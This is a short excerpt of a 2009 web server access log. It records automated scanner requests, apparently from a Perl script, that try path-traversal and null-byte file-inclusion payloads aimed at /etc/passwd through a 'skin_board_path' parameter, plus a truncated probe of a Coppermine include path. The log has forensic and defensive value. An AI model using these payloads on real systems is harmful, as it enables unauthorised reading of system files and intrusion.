77.221.130.2 - - [08/Jun/2009:04:04:21 -0400] "GET /index.php?skin_board_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:04:04:21 -0400] "GET /logs/index.php?skin_board_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
121.165.73.157 - - [08/Jun/2009:04:04:32 -0400] "GET /logs/access_log.Q109052500%20%20//modules/coppermine/include/init.i